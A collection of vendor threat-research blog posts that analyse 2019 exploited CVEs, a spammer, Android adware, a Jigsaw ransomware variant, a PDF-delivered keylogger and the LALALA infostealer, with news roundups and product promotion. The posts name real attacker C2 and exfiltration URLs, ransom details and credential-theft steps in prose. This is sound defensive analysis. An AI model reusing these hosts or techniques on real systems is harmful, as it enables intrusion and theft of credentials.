Top CVE's exploited in the wild

SonicWALL Capture Labs Threat Research team observed the below vulnerabilities most exploited by hackers in the year 2019.

  • BlueKeep (CVE-2019-0708)
  • SharePoint Server (CVE-2019-0604)
  • Win32k (CVE-2019-0859)
  • ThinkPhp (CVE not assigned)
  • Atlassian Confluence (CVE-2019-3396)
  • Drupal (CVE-2019-6340)
  • Oracle WebLogic (CVE-2019-2725)
  • Exim Server (CVE-2019-10149)
  • Microsoft GDI (CVE-2019-0903)
  • Webmin Server (CVE-2019-15107)

BlueKeep (CVE-2019-0708)

A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability’.

Affected Products: Windows 7, Windows XP, Windows Server 2008 and  Windows Server 2003.

Reference: https://securitynews.sonicwall.com/xmlpost/rdp-vulnerability-cve-2019-0708/

 

SharePoint Server (CVE-2019-0604)

An insecure deserialization vulnerability has been reported in Microsoft SharePoint Server. This vulnerability is due to insufficient validation user-supplied data to EntityInstanceIdEncoder.

Affected Products
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Foundation 2010 & 2013
Microsoft SharePoint Server 2010, 2013 & 2019

Reference: https://securitynews.sonicwall.com/xmlpost/microsoft-sharepoint-server-flaw-cve-2019-0604-is-actively-being-exploited/

 

Win32k (CVE-2019-0859)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’.

Affected Products
Microsoft Windows 7, 8.1, 10 & Rt 8.1
Microsoft Windows Server 2008, 2012, 2016 & 2019

Reference: https://securitynews.sonicwall.com/xmlpost/cve-2019-0859-exploits-active-in-the-wild/

 

ThinkPhp (CVE not assigned)

A command execution vulnerability exists in ThinkPHP CMS. The vulnerability is due to improper validation of the URL parameters in App.php.

Reference: https://securitynews.sonicwall.com/xmlpost/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited/

 

Atlassian Confluence (CVE-2019-3396)

A server side template injection vulnerability has been reported in Atlassian Confluence Server. This vulnerability is due to improper validation of the _template JSON parameter.

Affected Products:

Atlassian Confluence Server 6.14.x prior to 6.14.2
Atlassian Confluence Server 6.13.x prior to 6.13.3
Atlassian Confluence Server 6.12.x prior to 6.12.3
Atlassian Confluence Server 6.6.x prior to 6.6.12

 

Drupal (CVE-2019-6340)

A remote code execution vulnerability has been reported in the web services components of Drupal Core. The vulnerability is due to improper sanitization of data for certain Field Types from non-form sources prior to deserialization.

Affected Products:

Drupal Drupal 8.5.x prior to 8.5.11
Drupal Drupal 8.6.x prior to 8.6.10
Drupal Drupal 7.x

Oracle WebLogic (CVE-2019-2725)

An insecure deserialization vulnerability has been reported in Oracle Weblogic. This vulnerability is due to insufficient validation of XML data within the body of HTTP POST requests.

Affected Products

Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 10.3.6.0.0

Reference: https://securitynews.sonicwall.com/xmlpost/oracle-weblogic-vulnerability-actively-being-exploited-in-the-wild/

 

Exim Server (CVE-2019-10149)

A remote command execution injection vulnerability has been reported in Exim server. This vulnerability is due to insufficient handling of recipient address in the deliver_message() function.

Affected Products: Exim versions 4.87 to 4.91

Reference: https://securitynews.sonicwall.com/xmlpost/exim-email-servers-are-still-under-attack/

 

Microsoft GDI (CVE-2019-0903)

A remote code execution vulnerability has been reported in the GDI component of Microsoft Windows. The vulnerability is due to the way that GDI handles objects in memory.

Affected Products:

Microsoft Windows 7, 8.1, 10
Microsoft Windows Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019

Webmin Server (CVE-2019-15107)

A command injection vulnerability has been reported in Webmin. The vulnerability is due to improper validation of user supplied input within password_change.cgi.

Affected Products: Webmin prior to 1.930

Reference: https://securitynews.sonicwall.com/xmlpost/hackers-continue-to-mount-attacks-on-webmin-servers/

 

EXIT spammer: Evolution of this work-in-progress spammer executable

SonicWall Threats Research team is keeping an eye to the development of  EXIT spammer executable since the last few weeks. The malware author is continuously improving the spammer code to make it robust and rich in features. SonicWall RTDMI ™ engine is proactively detecting all the variants of the spammer executable.

The EXIT spammer author started from sending emails to his own email address and now has evolved to send emails to multiple recipients by dynamically updating Unified Resource Locator (URLs) in the email body:

 

Variant 1 (Self Spamming Executable):

This variant is created by malware author just to verify proper working of the executable code. The malware requests Simple Mail Transfer (SMTP) records from “h[t][t]p://45.138.172.6/check/get.php” and if the response contains “EXIT;” then it terminates the execution. An SMTP record contains “,” separated SMTP host, email address and password:

READS SMTP RECORDS

 

The malware creates multiple threads to synchronously access an SMTP record and extracts values from it. The malware has a list of ports (“25”, “587”, “2525”, “26”, “465”).  The malware calls the “SendData” method for each port and Secure Socket Layer (SSL) flag (true, false) until the method returns true, the “SendData” method has code to send an email and it returns true if the email has been sent. The “SendData” method accepts 5 parameters (host, email address, password, port, SSL flag):

 

The malware now prepares SMTP client and mail message fields:

SMTP Client Fields

From Email address from SMTP record and name as “Netflix”
To Self email address “test@cafegotta.com”
Subject “Tu cuenta presenta adeudos y será cerrada. newly,,,”
Body “~~~[host],[port],[email address],[password],[SSL flag]|||” + decodes and appends other body content which is kept by malware in base64 encoded form.

Mail Message Fields

Port Taken from list of ports
Credentials Email address and password from SMTP record
EnableSsl true or false
Timeout 500

The malware sends emails to its own email address with subject in “Spanish” which means “Your account has debts and will be closed. newly ,,,”. The malware also sends the sender information in the body, so it can verify at receiver’s end which configurations worked for sending emails:

 

The malware author can login to the email account “test@cafegotta.com” and can verify the working sender’s configuration by just looking at email body:

 

Variant 2 (Multiple Recipients Spamming Executable):

The malware author now knows which port and SSL flag has worked with which SMTP record, so he has added the working port and SSL flag into the SMTP record. The updated SMTP record now contains “,” separated host, port, email address, password and SSL flag. The malware reads SMTP records from “h[t][t]p://45.138.172.6/getdata.php” and recipients list from “h[t][t]p://45.138.172.6/list.txt”.

The malware shuffles SMTP records and picks a random record to prepare SMTP client and mail message, it also picks 20 recipients from the recipients list:

SMTP Client Fields

From Email address from SMTP record and name as “servicioalcliente@cfe.gob.mx”
Bcc 2o recipients from recipients list
Subject “Aviso de Factura.”
Body Decoded body content which is kept by malware in base64 encoded form.

Mail Message Fields

Port port from SMTP record
Credentials Email address and password from SMTP record
EnableSsl false
Timeout 3000

The malware keeps sending email using a random SMTP record to 20 recipients at a time, until the recipients list is exhausted. The email contains subject in “Spanish” which means “Invoice Notice.”:

 

The email body contains 2 hyper links which points to the same URL:

Variant change log:

  • Port and SSL flag updated in the SMTP record.
  • Shuffles and picks a random SMTP record.
  • Reads recipients list from URL.
  • Adds recipients to Mail Message “Bcc” instead of “To”.
  • In SMTP client SSL flag is set to “false”.
  • In SMTP client timeout update to “3000” instead of “500”.

Variant 3 (Updated URLs executable):

The malware reads recipients list from “h[t][t]p://45.138.172.6/getdata.php” which was previously used for SMTP records and reads SMTP records from updated URL “h[t][t]p://45.138.172.6/smtp.php”. The malware prepares SMTP client and Mail Message:

SMTP Client Fields

From Email address from SMTP record and name as “no-reply@facturarenlinea.com.mx”
Bcc 2o recipients from recipients list
Subject “Importante. Envío seguro de Comprobantes Fiscales Digitales.”
Body Decoded body content which is kept by malware in base64 encoded form.

Mail Message Fields

Port port from SMTP record
Credentials Email address and password from SMTP record
EnableSsl false
Timeout 3000

The email contains subject in “Spanish” which means “Important. Secure delivery of Digital Tax Vouchers.” and the email body contains 1 hyper link:

 

Variant change log:

  • Updated URL for SMTP records and recipients list.
  • Added comments in executable code.

 

Variant 4 (Dynamic hyper link updater executable):

The malware contains list of shortened URL:

 

The malware replaces “%%link%%” in email body with randomly selected shortened URL. This feature allows malware to update the URL in email body without changing the executable code:

 

The malware prepares SMTP client and Mail Message:

SMTP Client Fields

From Email address from SMTP record and name as “no-reply@facturarenlinea.com.mx”
Bcc 2o recipients from recipients list
Subject “Importante. Envío seguro de Comprobantes Fiscales Digitales.”
Body Decoded body content which is kept by malware in base64 encoded form after replacing “%%link%%” with shortened URL.

Mail Message Fields

Port port from SMTP record
Credentials Email address and password from SMTP record
EnableSsl false
Timeout 3000

The email body contains 1 shortened hyper link to download an archive “Factura.zip” which contains 2 PDF files:

 

Variant change log:

  • Replaces “%%link%%” in email body with randomly selected shortened URL.

 

SMTP records:

 

Conclusion:

The malware author is regularly updating EXIT spammer executable code to provide additional functionalities. SonicWall Threats Research team is keeping EXIT spammer on surveillance and expecting more variants in the coming days.

 

Unavailability of the EXIT spammer executable variants in any of the popular threat intelligence sharing portals like VirusTotal and ReversingLabs at the time of writing this blog indicates its ability of keeping a low profile:

 

Evidence of the detection for the first variant and the recent variant by RTDMI ™ engine can be seen below in the Capture ATP report:

Christmas themed Android malware/adware for 2019

The Christmas season brings new targets and themes for malware writers, they use these themes to lure and infect new victims. SonicWall Capture Labs Threats Research team searched for Christmas themed Android samples with malicious intentions.

We scanned popular threat portals for Android samples with keywords like ‘Christmas’, ‘Santa Claus’, ‘Holidays’, etc.  We observed the following trends among Android samples with detection. The number of Christmas themed samples increases as we near the month of December:

 

 

  • MD5: dec0a7b5e450139ae1bfcf7e80e9fc8e
  • Package Name: com.amphibius.santa_vs_zombies1

After installation and execution the app displays the menu screen, in the background it communicates with the domain apir.direct-tap.com:

VirusTotal relations show a number of apps with malicious rating communicate with the domain apir.direct-tap.com:

Once we exit from the app, we observed a shortcuts created on the homescreen:

We observed this app was present in the assets folder and are locally stored at /storage/emulated/0/temp1/:

Once the app shortcut is clicked, a Google Play Protect prompt that requests the user to grant permission to allow the installation of this app from a custom source:

This is dangerous as it is a security risk to install apps from sources other than the Play store.

 

  • MD5: 26fbbe52012d9ba69215892fa32d9fee
  • Package Name:com.infovine.yo.app

After installation and execution this app displays a screen with very few options to click:

In the background the app sends sensitive information about the device to the domain gamedroid.pm. This domain has been observed to communicate with malicious Android apps:

On clicking the ‘proceed’ button a GET request goes out to despfans.com/minionrushcheats.apk. This domain is currently down so the apk was not downloaded:

Like the previous app that was analyzed, this app shows a shortcut on the screen as well. Upon clicking this shortcut an attempt is made to download an apk from the domain antivirus-pro.us. Since this domain is currently unregistered the app is not downloaded:

This domain was scanned in the past to host malicious apps:

 

 

  • MD5: 63b99543b9f87e7718fe5804868fa8c5
  • Package Name: com.gogyimogyi.livewallpaper.goldchristmas3d 

We encountered a number of samples with high number of detection ratio on VirusTotal as AirPush adware. These samples contain the AirPush advertisement library which likely triggered detections for these samples.

VirusTotal graph below for the domain api.airpush.com shows a large number of samples with high detection ratio communicating with this domain:

Malware writers hide malicious applications under the guise of what is popular currently. With Christmas almost upon us, we are seeing increasing number of malicious Christmas themed Android apps.

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.InstallApk.GM
  • AndroidOS.Downloader.DN
  • AndroidOS.Airpush.AD_2

Jigsaw ransomware variant: Melka, easily reveals decryption key

The SonicWall Capture Labs Threat Research Team observed reports of another variant of the Jigsaw ransomware spreading in the wild.  The malware is written in .NET and appears to be Czech in origin.  Payment is to be made in bitcoin although it is unclear how much is required for file decryption.

Infection cycle:

The malware executable file contains the following metadata:

 

Upon execution the following messagebox is displayed:

 

The malware encrypts files in the background and gives each file a .fun extension.  After this the following dialog is displayed with text emerging character by character:

 

After the full message is displayed, a 1 hour countdown is started.  The ransom demand translates to a payment of 100 eggs.  We’re not sure what this means:

 

The dialog also provides a list of files that were encrypted:

 

The following files are added to the system:

  • %APPDATA%\System32Work\Address.txt (contains bitcoin address: 1Hd3tU8MDmuVotMgGJTJ7svzvPey6bfUgm)
  • %APPDATA%\Frfx\firefox.exe (copy of original malware file [Detected as: GAV: Melka.RSM (Trojan)])
  • %APPDATA%\System32Work\dr (contains “21“)
  • %APPDATA%\System32Work\EncryptedFileList.txt (a list of files that were encrypted)

The following registry key is added:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefox.exe “%APPDATA%\Frfx\firefox.exe”

The malware is written in .NET.  A quick decompilation of the malware reveals various routines involved in the encryption and decryption process:

 

The decryption routine is also easy to find and the decryption key (“OoIsAwwF32cICQoLDA0ODe==”) easily revealed:

Further analysis also reveals a list of file extensions that are used to identify files to encrypt:

.jpg .jpeg .raw .tif .gif .png .bmp .3dm .max .accdb .db .dbf .mdb .pdb .sql.dwg .dxf .c .cpp .cs .h .php .asp .rb .java .jar .class .py .js .aaf .aep.aepx .plb .prel .prproj .aet .ppj .psd .indd .indl .indt .indb .inx .idml.pmd .xqx .xqx .ai .eps .ps .svg .swf .fla .as3 .as .txt .doc .dot .docx .docm.dotx .dotm .docb .rtf .wpd .wps .msg .pdf .xls .xlt .xlm .xlsx .xlsm .xltx.xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam.ppsx .ppsm .sldx .sldm .wav .mp3 .aif .iff .m3u .m4u .mid .mpa .wma .ra .avi.mov .mp4 .3gp .mpeg .3g2 .asf .asx .flv .mpg .wmv .vob .m3u8 .mkv .dat .csv.efx .sdf .vcf .xml .ses .rar .zip .7zip@

 

The following strings are also present in the executable file thus identifying it as a Jigsaw ransomware variant:

C:\Users\Admin\Desktop\Melka_vajrus30\JigsawRansomware\JigsawRansomware\obj\Release\MelkaVajrus30.pdb

TxtTest.txt

I am a txt test.

NotTxtTest.nottxt

I am NOT a txt test.

EncryptedFileList.txt

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Melka.RSM (Trojan)
  • GAV: Jigsaw.RSM_26 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CODESYS web server buffer overflow CVE-2019-18858

CODESYS
CODESYS is a development environment for programming controller applications.

CODESYS WebVisu
The CODESYS web server is used by the CODESYS WebVisu to display CODESYS visualization screens in a web browser. With a controller, equipped with the CODESYS WebVisu you can comfortably visualize your CODESYS screens optimized in a web browser, whenever and wherever you want.

The Vulnerability
CODESYS 3 web server before 3.5.15.20, as distributed with CODESYS Control runtime systems, has a Buffer Overflow. (CVE-2019-18858)
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code.
Specially crafted requests to the CODESYS WebVisu server can lead to heap buffer overflow. Further this could crash the web server, lead to a denial-of-service condition or may be utilized for remote code execution. As the web server is part of the CODESYS runtime system, this may result in unforeseen behavior of the complete runtime system.
A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target web server. Successful exploitation results in arbitrary code execution in the security context of the process.

Like in the case below, the remote attacker can POST to the WebVsuV3 url containing a special header followed by a long payload(which can be malicious).

The PoC is publically available here https://github.com/tenable/poc/blob/master/codesys/codesys_v3_webserver_heap_overflow.py

Mitigation
Upgrading the CODESYS 3 web server to version higher than 3.5.15.20 will mitigate the risk .

SonicWALL Capture Labs Threat Research team provides protection against this threat via following signatures:
IPS 14673 CoDeSys CmpWebServer Buffer Overflow 2
IPS 14674 CoDeSys CmpWebServer Buffer Overflow 3

Cyber Security News & Trends

This week, SonicWall warnings about school districts under cyberattack prove prophetic as a new bill to protect K-12 districts is introduced, and do you know that the first ransomware attack was 30 years ago?


SonicWall Spotlight

US Senators Introduce Bill to Protect Schools Against Cyber-Threats – Infosecurity Magazine

  • SonicWall CEO Bill Conner weighs in on the importance of cybersecurity in school districts, commenting on a new bill introduced to the US House of Representatives this week. The bill is designed to enhance the cybersecurity of K–12 schools in a year where they have suffered heavily under cyberattacks.

Cybersecurity News

Hackers Steal Data for 15 Million Patients, Then Sell It Back to Lab That Lost It – Ars Technica

  • Canada’s biggest provider of lab testing services has confirmed it suffered a data breach, with info as old as 2016 accessed. It has also admitted that it made “a payment” to the hackers to retrieve the data, without disclosing exactly how much was paid.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized – HelpNetSecurity

  • A new in-depth report draws on a decade’s worth of cyberattack data in the oil and gas industries, calling for a strengthening of cybersecurity as the risks continue to escalate.

Mobile Devices Account for 41% of DDoS Attack Traffic – Dark Reading

  • While the image DDoS attacks conjure up might be one of racks of computers all being harnessed, the reality right now is that around half of the traffic is now coming from mobile and IoT devices. A newly released report on DDoS attacks looking deeply into the current DDoS threat landscape also finds that China, Turkey, the US, and South Korea are the main sources of the attacks.

WhatsApp Updated to Patch Bug That Allows Attacker to Crash Group Chats – Washington Times

  • Another WhatsApp bug has been discovered and patched. This particular vulnerability allowed a user to send a malicious message to a group chat that would cause the app on every participant’s mobile device to continuously crash.

Maze Ransomware Gang Dumps Purported Victim List – BankInfoSecurity

  • In the latest escalation of ransomware attacks, the gang behind the Maze ransomware is threatening to name and shame victims if they do not pay the ransom. Proving they can make good on their threat, last month the gang published data stolen from a security services firm who did not pay.

10 Cybersecurity Stories in 2019 That Make Us Feel Less Secure – Tech Republic

  • Before looking to the future, we have to look to the past. Tech Republic lists the top 10 2019 cybersecurity stories that worry them the most, including the Capital One breach, juice jacking, and the number of adware attacks like xHelper and Joker in the Android ecosystem.
And Finally

30 Years of Ransomware: How One Bizarre Attack Laid the Foundations for the Malware Taking Over the World – ZDNet

  • Thirty years ago, the first ransomware attack was launched… on a floppy disk… with a PO Box to pay the ransom by postal order or check.

In Case You Missed It

PDF using unseen MS-Office URI-Scheme to run remote office to deliver Key-Logger

Malware authors are using a new technique to run remote Microsoft Office (MS Office) files. SonicWall threat research team has observed a PDF file with embedded JavaScript, which is using MS Office URI scheme to run a remote Microsoft Excel file which is hosted on DropBox.

The PDF file is not detected by any security vendors on the popular threat intelligence sharing portal VirusTotal, at the time of writing this blog indicates its spreading potential. The PDF file is available on VirusTotal from 13 December, 2019:

VirusTotal screenshot

Figure 1 VirusTotal screenshot

The PDF file has an image displaying a message ‘Browser not supported’ and shows steps to open the invoice file.

The PDF file has a JavaScript, which invokes “launchURL” API which uses MS-Office URI scheme “ms-excel:” to run remote MS Excel file. MS Excel filename resembles itself as an invoice, to disguise the user.

PDF file First Page

Figure 2 PDF file First Page

Embedded JavaScript

Figure 3 Embedded JavaScript

The MS Excel file has a macro which takes the hidden command from Tag attribute of user form and executes the command, which downloads and executes an XML file containing malicious VBScript. After this, it will prompt a message “An attempt was made to load a program with an incorrect format. Document will now EXIT and Open in Default.” and terminates using “Application.Quit”. The above message is displayed to mislead the user, to think that the MS Excel file has not executed. The above XML file is downloaded with a misleading file extension as “.jpg”.

ScreenShot of Excel File

Figure 4 ScreenShot of Excel File

Macro in Excel File

Figure 5 Macro in Excel File

Command to download and execute XML in the Form tag

Figure 6 Command to download and execute XML in the Form tag

The XML file contains embedded VBScript which invokes PowerShell. The PowerShell script downloads an executable file and executes it from %LOCALAPPDATA%.

XML file having embedded VBS file.

Figure 7 XML file having embedded VBS file.

Base64 Decode PowerShell cmdlet

Figure 8 Base64 Decode PowerShell cmdlet

Both XML and executable files are hosted with ‘jpg’ extension. The executable is a self-extracting PE file with an icon of an image to imitate it as an image file. We have observed that the malware author tries to gain user’s trust at every stage using simple tricks like hosting file on dropbox, using MS-Office URI scheme, imitate as invoice document, showing fake messages and downloading malicious components with image file extensions.

The PE file upon execution, drops 19 fake files with garbage data, an AutoIT script (“vhctd.von”) and an AutoIT executable (“wxvjlxqa.pif”) in %TEMP%\33775137.

Dropped files

Figure 9 Dropped files

It creates a run entry for AutoIT executable with AutoIT script file path as an argument and it executes the AutoIT script using AutoIT executable. The AutoIT script then launches and injects code in “RegSvcs.exe”, “Regsvcs.exe” then logs keys and stores them into the registry key “HKCU\Software\Windows Update\[kl]”.

RUN Registry entry

Figure 10 RUN Registry entry

Registry Entry which store recorded key pressedFigure 11 Registry Entry which store recorded key pressed

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: KeyLogger.PDF_2 (Trojan)

SonicWall RTDMI ™ engine is detecting this PDF File which downloads and executes remote MS Office files.

Cyber Security News & Trends

This week, SonicWall Capture Threat Labs releases data on cyberattacks over the Black Friday and Cyber Monday holiday period, and the cybercriminals involved in the attacks put the stolen data up for sale.


SonicWall Spotlight

Veiled Threats: The Growing Cyberattack Vectors Few People Talk About – Forbes

  • While many people are aware that malware attacks like ransomware can happen through a phishing email or an infected USB key, less well known are the attacks that use encryption or launch using non-standard ports. SonicWall CEO Bill Conner discusses the growth of these veiled threats, and how SonicWall protects from them, in his latest Forbes Technology Council post.

Black Friday Cyberattacks: Businesses Face Surge of Malware, Ransomware on U.S. Shopping Holiday – SonicWall Blog

  • The SonicWall Capture Threat Labs threat researchers releases data on cyberattacks across the 2019 Black Friday and Cyber Monday holiday period. In general, there was as much as a 63% surge in malware attacks over the shopping window, with attackers concentrating more on Black Friday than on Cyber Monday.

SonicWall and Veeam Enhance Managed Service Support – Computer Weekly

  • SonicWall’s recently launched My Workspace is covered by Computer Weekly, including SonicWall’s Terry Greer-King explaining why the technology is needed as more customers plan to move to a shared model or fully MSSP mode.

Cybersecurity News

The FBI Is Warning That Your Smart Home Devices Aren’t Secure. Here’s What You Should Do About It – Inc

  • Despite a recent FBI warning about cyberthreats attacking via the Internet of Things, the truth is that most smart devices currently have almost no cybersecurity. With this in mind, Inc takes a look how to protect your network from cyberattacks, with reference to SonicWall firewalls.

A $200,000 Internet Fraud: Will Anyone Investigate? – BankInfoSecurity

  • The story of a $200,000 phony bank scam exposes the difficulty in getting law enforcement agencies to investigate all but the highest profile internet fraud.

The Case for Cyber Insurance – Security Week

  • As the ongoing case between Mondelez and Zurich American Insurance highlights the complexities in deciding whether or not a cyberattack can be defined as a nation state attack, Security Week makes the case for specifically buying cyber insurance.

TrickBot Gang Is Now a Malware Supplier for North Korean Hackers – ZDNet

  • A newly published report finds that he authors of Trickbot, one of today’s top three malware botnets, has been linked to a North Korea state-sponsored hacking group known as Lazarus.

Cost of Data Breaches in 2019: The 4 Worst Hits on the Corporate Wallet – Security Boulevard

  • British Airways, Capital One, Marriott… some of the biggest breaches in recent times only started to affect the companies involved in 2019. These are not the biggest data breaches by volume, but by cost.
And Finally

Joker’s Stash Celebrates Turkey Day With Stolen Card Data – BankInfoSecurity

  • This week, a huge batch of card details stolen over the Thanksgiving shopping period appeared for sale online, with a price tag of half a million dollars. Successful use of Magecart card-skimming software is the most likely to blame.

In Case You Missed It

Smarter Cybersecurity: How SecOps Can Simplify Security Management, Oversight & Real-Time Decision-Making

Organizations continue to be alarmed by how easily cybercriminals can circumvent security defenses as malware, ransomware, cryptojacking and phishing attacks make headline news.

In addition, security operations lack visibility and awareness of unsafe network and user activities, network traffic irregularities, and unusual data access and utilization. This exacerbates the situation and creates a dangerous condition where security teams are too late or unable to:

  • Respond to security alerts or incidents at the speed and accuracy they need
  • Conduct thorough and effective investigations
  • Find answers fast enough to take corrective actions

Through close engagements with our top channel partners and key customers, SonicWall learned and understood these challenges first-hand. And through that collaboration, SonicWall developed and introduced the SonicWall Capture Security Center and two powerful risk management tools ­— Analytics and Risk Meters — to help customers solve these difficult problems.

Govern, comply and manage risk

The Capture Security Center is grounded on three core objectives:

‘Govern Centrally’ focuses on improving operational efficiencies and reducing overhead, while ‘Compliance’ and ‘Risk Management’ concentrate on the business value. These core objectives are interdependent as each leverages a common set of information, processes and technologies that help SecOps establish and deliver a strong, federated security defense and response services at the core of their security program.

Work faster and smarter — with less effort

Capture Security Center is a cloud solution organizations use to avoid operational overhead associated with software and hardware installation, upgrades and maintenance. This solution provides SecOps teams secure single sign-on (SSO) access to license, provision and manage their entire SonicWall security suite, including network, wireless, endpoint, email, mobile and cloud security products and services.

Think of it as a high-productivity tool that provides authorized users access to all available security services based on their role and access rules. The command console is assessible from any location and from any web-enabled PC. Once signed in, users are automatically granted access to everything — and are able do everything securely — using one cloud app.

The different tiles (shown below) are exactly what you’ll see when you log in to your Capture Security Center account. Users can easily navigate between tenants presented on the left panel and, on the right panel, manage any licensed cloud services registered to that tenant.

Available in January 2020, Capture Security Center version 1.8 adds capabilities for security teams to:

Study risks and threats in real time with real-world data

SonicWall Risk Meters is a threat monitoring and risk-rating tool we’ve integrated into the Capture Security Center. The tool is available to all SonicWall Capture Security Center customers at no additional cost.

Risk Meters, shown below, gives a direct line of sight into the cyberattacks affecting your security posture. Threat vectors are represented by colored arrows while threat types are shown as icons.

Clicking on an icon pops up an information panel that provides a detailed description of the threat. A tenant drop-down list allows you to view threat metrics at the tenant level. Visibility into the attacks targeting various defense layers helps guide your response to where immediate defensive actions are needed for a specific environment.

The first defense layer captures attacks blocked by the firewalls, Capture Advanced Threat Protection (ATP) sandbox and WAF.

The second defense layer reveals attacks targeting your SaaS appliances and email environments.

The third defense layer shows threats attacking your users’ devices. The DEFCON and Shield Level ratings displayed at the top-right corner provide the computed risk scores based on existing defense layers. Scores are adjusted as you toggle to activate or deactivate available services.

Taking this a step further, Risk Meters gains several important improvements in Capture Security Center 1.8. A new control panel presents users with customization functionalities to run analysis on a variety of threat data.

This new feature allows for experimenting “what-if” simulations at a more granular level to see how the risk score dynamically changes when sub-components of certain layer or multiple layers are added or removed.

Up until this release, risk scores were calculated based solely on security services from SonicWall. To give a more accurate account of customer security environments, CSC now factors in all security controls when calculating the risk scores, including non-SonicWall services.

The Risk Meters Control Panel allows users to configure and weigh third-party security controls into the calculated risk scores. Users can now review trends of different threat types and then compare them against regional and global averages to help identify which threat vectors to focus on and where to prepare their defenses.

Transforming threat data into decisions, decisions into actions

In conjunction with Capture Security Center 1.8, SonicWall releases Analytics 2.5 to introduce a new user-based analytics and reporting function to helps security teams visualize and conduct investigations into users’ actions and application and data usage.

Security teams can monitor or drill-down into the security data for more details about the user network traffic, access and connections, and what applications are being used and websites are frequently visited.

Also, security teams can investigate attacks that target a certain group of users and bandwidth costs associated with resource utilization to determine if policy-tuning or added configurations are needed to reduce their risk profile or optimize network performance.


About the SonicWall Capture Security Center

Capture Security Center is a scalable cloud security management system that’s a built-in and ready-to-use component of your SonicWall product or service. It features single-sign-on and ‘single-pane-of-glass’ management. It integrates the functionality of the Capture Cloud Platform to deliver robust security management, analytics and real-time threat intelligence for your entire portfolio of network, email, endpoint, mobile and cloud security resources.

Capture Security Center delivers a valuable team resource to help organizations control assets and defend entire networks from cyberattacks. Unify and synchronize updates and support, monitor security risks and fulfill regulatory compliance — all with greater clarity, precision and speed.

LALALA InfoStealer which comes with Batch and PowerShell scripting combo

Malware authors are using simple but very effective approaches to stay low and steal user’s data. SonicWall RTDMI ™ engine has recently detected Windows shortcut file (LNK) inside an ISO image which downloads and executes LALALA infostealer to the victim’s machine. LALALA infostealer is a batch script, which takes help of PowerShell to steal and send victim’s data to the server:

 

The LNK file copies itself to “%TEMP%\ htn90.bat” and executes the batch script file. The malware is intended to run only once on the victim’s machine. The batch script checks presence of “%TEMP%\htn.txt” file, if already present then the batch script terminates and deletes itself. The batch script writes “htn” into “%TEMP%\htn.txt”. The batch script downloads an archive file “%TEMP%\htn.rar” and a WinRAR (compression tool) executable file “%TEMP%\rar.exe” from Unified Resource Locator (URL) h[t][t]p://185.183.96.54/[filename].

The batch script extracts LALALA infostealer “htn.bat”, an image file “lebenslauf_2019_11_20.jpeg” and an executable “sqlite3.exe” from “%TEMP%\htn.rar” using WinRAR executable:

 

The batch script displays “lebenslauf_2019_11_20.jpeg” image to the user which contains “ERROR 0x89976 IMAGE BROKEN” message, to make him feel that the LNK file has some issues. The batch script then executes LALALA infostealer “%TEMP%\htn.bat”:

LALALA InfoStealer:

The malware creates directory “%TEMP%\jjghgjhfyt6”  to store the stolen data. The malware uses PowerShell command to collect and save installed programs information into “%TEMP%\jjghgjhfyt6\proglist.txt”:

 

BACKDOOR ACTIVITY:

The malware opens a backdoor to the malware author by scheduling a task which executes the VBScript “%TEMP%\[random].vbs” every minute. The VBScript takes web request result from “185.183.96.54/gate990.php” as an argument and it contains the code to execute the argument:

 

DATA EX-FILTRATION:

The malware usually process the data on victim’s machine to extract very precise information which is sent to the malware server. But LALALA sends good amount of data to the server which needs further processing at server’s end to extract the operative data. The malware decrypts some application’s data (eg. Google Chrome and Microsoft Edge) on victim’s machine which uses Windows logon based encryption because that data can not be decrypted on the other machine.

The malware steals login information from listed applications:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Mozilla Thunderbird
  • Microsoft Outlook

The malware copies Chrome data files “cookies”, “Login Data” and “Web Data” from “%LOCALAPPDATA%\Google\Chrome\User Data\Default” to “%TEMP%\jjghgjhfyt6\”. The malware decrypts and saves card details, cookies and passwords into “%TEMP%\jjghgjhfyt6\”:

 

The malware copies data files from Mozilla Thunderbird and Mozilla Firefox to “%TEMP%\jjghgjhfyt6”:

 

The malware terminates “taskhost” and “dllhost” processes, then it decrypts and saves login passwords from Microsoft Edge into “%TEMP%\jjghgjhfyt6\edg_[randome]”:

 

The malware decrypts and saves Outlook data into %TEMP%\jjghgjhfyt6\outloo_[random]:

 

NETWORK:

The malware compresses stolen data using WinRAR executable into “%TEMP%\[random].rar” and sends the compressed file to “185.183.96.54/zit.php”. The malware deletes the stolen data files and malware component files except “%TEMP%\htn.txt”:

 

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog indicates its spreading potential:

 

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file: